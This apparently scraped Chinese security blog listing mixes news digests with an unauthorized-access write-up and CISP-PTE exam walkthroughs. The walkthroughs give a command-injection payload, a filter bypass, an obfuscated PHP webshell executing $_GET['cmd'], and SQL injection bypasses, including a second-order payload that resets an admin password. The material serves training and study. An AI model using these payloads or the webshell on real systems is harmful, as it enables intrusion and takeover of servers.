据《卫报》报道,谷歌云服务发生了一起前所未见的重大配置错误事故,导致澳大利亚 UniSuper 基金云订阅账户被删除,服务中断长达一周。 10、英国去年遭受的勒索软件和网络攻击达到历史新高 https://therecord.media/uk-ico-ransomware-cyberattacks-data-2023 根据信息专员办公室(ICO)最新的安全事件趋势数据更新,2023 年网络事件造成的数据泄露,尤其是勒索软件攻击,再创历史新高,自有记录以来,勒索软件攻击数量逐年增加。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记一次特别的未授权访问
某个夜里,随手点进去的一个小程序,引发的连锁反应。 开局一个小程序: 登录方式令人发愁,尝试收集,无果。 数据交互的地方说不定有sql,再次尝试,还是无果。 复制连接去web端,看看有没有什么收获: 好熟悉的界面,这不是SpringBoot框架不,立马工具梭哈。 果然存在springboot未授权访问,网上查找了一些相应的资料,不同的路径泄露不同的信息。 访问/actuator 发现存在heapdump,heapdump是一个二进制文件,里面存储大量敏感信息,立马访问下载,使用工具爬取敏感信息(JDumpSpider-master自动化爬取heapdump工具,特别好用)。 成功找到redis密码,同样还有nacos密码。 Redis连接,无果,但是还有nacos,访问/ actuator/env,寻找地址。 立即访问,还是无果。正当我准备放弃时,又发现一个地址而且是同ip下不同的端口,同样访问。 第一次遇见也不知道是什么,弱口令爆破一波,无果。为什么我这么弱,不甘心,复制粘贴浏览器搜索,还真就给他搜出东西来了。 再次尝试默认密码,无果,我最后的希望ssrf,拿下payload测试。 好像有戏,但是我们登录不进去,看不到是否成功,于是想到了无回显的ssrf的利用,联动dnslog,看看是否有外联日志,说干就干,先到dnslog网址上申请一个ip,将127.0.0.1替换。 来了来了,存在ssrf。(点到为止) 结论: 测试是一个艰辛又漫长的过程,抓住一切的可能才有结果。在任何情况下,未经授权的渗透测试行为都是违法的,可能导致严重的法律后果。因此,在进行任何安全测试之前,请务必与目标单位达成明确的协议和授权。
网络安全日报 2024年05月13日
1、zEus Stealer恶意软件通过Crafted Minecraft源包分发 https://www.fortinet.com/blog/threat-research/zeus-stealer-distributed-via-crafted-minecraft-source-pack 许多游戏制作商允许用户改变游戏的外观或行为以增加其乐趣和重玩价值。玩家通常还可以下载其他人创建的包。然而,这也是攻击者传播恶意软件的机会。研究人员发现了通过精心设计的 Minecraft 源包分发的批量窃取程序。zEus 窃取者恶意软件已添加到 YouTube 上共享的源包中。名称“zEus”来自该恶意软件的早期变体。该变体也通过 Minecraft 源包分发,但它嵌入在 WinRAR 2、Veeam修复了备份管理平台中的高严重性漏洞 https://helpcenter.veeam.com/docs/vac/deployment/about.html?ver=80 Veeam 已修复 Veeam 服务提供商控制台 (VSPC) 中的一个高严重性漏洞 (CVE-2024-29212),并敦促客户实施该补丁。Veeam 服务提供商控制台是托管服务提供商 (MSP) 和企业用来管理和监控数据备份操作的云平台。“服务提供商可以部署 Veeam 服务提供商控制台,向其客户提供由 Veeam 支持的备份即服务和灾难恢复即服务服务。企业可以使用该解决方案来简化远程办公室、分支机构或其他地点的备份操作。”该公司解释道。CVE-2024- 3、Kimsuky针对加密货币公司部署新型Golang恶意软件Durian https://securelist.com/apt-trends-report-q1-2024/112473/ 据观察,被追踪为 Kimsuky 的朝鲜威胁行为者部署了一种先前未记录的基于 Golang 的恶意软件,称为Durian,作为针对两家韩国加密货币公司的高度针对性网络攻击的一部分。Durian 拥有全面的后门功能,能够执行已发送的命令、额外的文件下载和文件泄露。这些攻击发生在 2023 年 8 月和 11 月,需要使用韩国独有的合法软件作为感染途径,但目前尚不清楚用于操纵该程序的确切机制。该软件会建立与攻击者服务器的连接,从而导致检索恶意有效负载,从而启动感染序列。 4、俄罗斯APT28组织针对波兰机构开展大规模恶意软件活动 https://cert.pl/en/posts/2024/05/apt28-campaign/ 波兰政府机构已成为由与俄罗斯有联系的民族国家组织APT28精心策划的大规模恶意软件活动的一部分。计算机紧急响应小组 CERT Polska在周三的公告中表示: “该活动发送的电子邮件内容旨在引起收件人的兴趣并说服他点击链接。”单击该链接会将受害者重定向到 run.mocky[.]io 域,该域又用于重定向到另一个名为 webhook[.]site 的合法网站,这是一项免费服务,允许开发人员检查正在发送的数据通过网络钩子,以逃避检测。 5、Mirai僵尸网络利用Ivanti Connect漏洞进行恶意Payload传输 https://blogs.juniper.net/en-us/security/protecting-your-network-from-opportunistic-ivanti-pulse-secure-vulnerability-exploitation 最近披露的 Ivanti Connect Secure (ICS) 设备中的两个安全漏洞正被用来部署臭名昭著的Mirai 僵尸网络。研究人员表示漏洞CVE-2023-46805 和 CVE-2024-21887已被利用来传递僵尸网络有效Payload。CVE-2023-46805 是一个身份验证绕过漏洞,而 CVE-2024-2188 6、Telit Cinterion 蜂窝调制解调器容易受到短信接管攻击 https://ics-cert.kaspersky.com/vulnerabilities/ Telit Cinterion 蜂窝调制解调器广泛应用于工业、医疗保健和电信等领域,其安全漏洞可能允许远程攻击者通过短信执行任意代码。安全研究人员去年 11 月披露了一组八个独立问题,其中七个标识符为 CVE-2023-47610 到 CVE-2023-47616,另一个尚未注册。在发布安全问题之前,安全公司已于 2023 年 2 月向供应商报告了这些问题。周六,在柏林举行的 OffectiveCon 会议上,Alexander Kozlov 和 Sergey Anufrienko 将提供有关安全 7、攻击者滥用戴尔API并窃取了4900万条客户记录导致数据泄露 https://www.bleepingcomputer.com/news/security/dell-api-abused-to-steal-49-million-customer-records-in-data-breach/ 最近戴尔数据泄露事件背后的威胁者透露,他们使用以假冒公司身份访问的合作伙伴门户 API 抓取了 4900 万条客户记录的信息。戴尔已开始发送通知,警告客户他们的个人数据在数​​据泄露中被盗。此次数据泄露包含客户订单数据,包括保修信息、服务标签、客户姓名、安装位置、客户编号和订单编号。4 月 28 日,名为 Menelik 的威胁行为者在 Breached 黑客论坛 8、财政部、国家网信办发布《会计师事务所数据安全管理暂行办法》 https://www.freebuf.com/news/400561.html 结合《国务院办公厅关于进一步规范财务审计秩序 促进注册会计师行业健康发展的意见》(国办发〔2021〕30号)中的相关规定,财政部和国家互联网信息办公室联合制定了《会计师事务所数据安全管理暂行办法》,旨在强化会计师事务所的数据安全管理,确保其数据处理活动的规范性和安全性。 9、LockBItSupp否认自己就是LockBit 头目霍罗舍夫 https://therecord.media/lockbitsupp-interview-ransomware-cybercrime-lockbit LockBit 勒索软件团伙的头目网络名叫 LockBitSupp,他在接受采访时称国际执法部门犯了一个错误:他不是德米特里·尤里耶维奇·霍罗舍夫,执法部门将错误的人附加到了他的名称上。 10、波音公司去年43GB 数据泄露,拒绝向黑客支付 2 亿美元赎金 https://www.ithome.com/0/766/908.htm 波音公司周三披露细节,称 2023 年 11 月公司遭到勒索软件攻击,黑客索要高达 2 亿美元(的赎金,最终公司决定拒绝支付。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记一些CISP-PTE题目解析
0x01 命令执行 直接payload: 127.0.0.1 &whoami,发现可以成功执行whoami命令 然后ls ../ ,发现有个key.php文件 尝试用cat命令查看发现不行被拦截了。(其实题目过滤了常用的查看文件的命令) 这里有两种思路,第一种是根据题目意思用命令执行写webshell的方式去进行getshell,第二种方式则是使用linux的命令进行绕过。这里采用第二种方式使用c''at的方式进行绕过。 0x02 基础题目之文件上传突破 可以发现部分上传代码,文件名被命名成一个随机数加上原本的文件名然后md5的值。 直接上传一个带图片头的php木马(会检测是否是图片,所以需要一个GIF89A当图片头),而且过滤了一些敏感函数如eval等。这里直接上传一个免杀的木马即可。 <?php function go() { $func1 = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); return $func1; } $func1 = go(); $array1 = array($_GET['cmd']); array_map($func1, $func1 = $array1); ?> 然后接下来就是爆破出shell的地址了,这里我们直接把上传的数据包重放1000次用来提高爆破成功的效率。 用burp的null payload发送1000次 然后设置上传的文件名1.php为前缀,加上随机数的1~99999,最后经过md5加密即可。 设置前缀为1.php (上传的文件名) 然后添加md5 最后就是等待爆破成功。 key在web根目录下的key.php文件 0x03 基础题目之流量分析 下载数据包,使用wireshark发现是http协议居多,首先可以使用wireshark的导出文件查看一下http的访问文件分组。 可以发现攻击者在进行目录爆破。这里可以直接选择 然后根据文件大小排序一下,发现其中有一个压缩包。 但是压缩包设置了密码 然后查找http数据中是否有包含压缩包名字的数据包,其中phpspy.php包含了这个压缩包的名称。 追踪流结果发现Adm1n!是解压密码(%21是url编码) 0x04 代码审计 考点就是让数字绕过is_numerice判断,这里直接使用数字后面跟一个字符串即可绕过。 0x05 基础题目之SQL注入 首先发现题目有一个注册界面,注册账号之后进行登录。 然后再发表文章处发现存在insert注入。 直接抓取数据包使用sqlmap即可 0x06 基础题目之SQL注入 没什么特别的,只是过滤了union关键字这里用双写绕过就可以了, ununionion这样。 然后直接load_file读取文件即可获取key。 0x07 无回显命令执行 很简单,看了一下代码,限制了cmd参数的命令长度而已。可以使用linux的流符号生成一个文件 0x08 二阶SQL注入 二次注入是一种SQL注入攻击的形式,它涉及到用户输入的数据在第一次被存储到数据库中时被错误地处理,导致在后续的查询中,这些原本被转义的数据再次被使用,从而执行恶意命令。 第一步是插入恶意数据: 在第一次插入数据时,开发者可能使用了函数如addslashes过滤了,这时是没有问题的。 比如注册功能: 这里注册一个test'用户 ,由于'被成功转义成了'所以这里是能够正常执行sql语句的。 然后登录test'用户也是没有问题的 但是问题出现再第二次数据库操作中,由于被存入的数据库的用户名是test',那么在第二次系统从数据库中获取用户名的时候如果没有过滤那么就会造成二次注入。 比如更新密码: 系统的语句可能会长这样: update user set passwd = 'newpasswd' where uname = 'test'' #test'是用户名。那么这种情况就可能导致注入。 那么二次注入怎么利用,这里可以看到需要admin用户登录才能够得到key,那么我们能够用构造一条语重置admin密码就可以了 update user set passwd = 'newpasswd' where uname = 'aaa' or 1 --a' aaa' or 1 -- a是用户名 用新用户重置admin的密码 再次登录admin
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页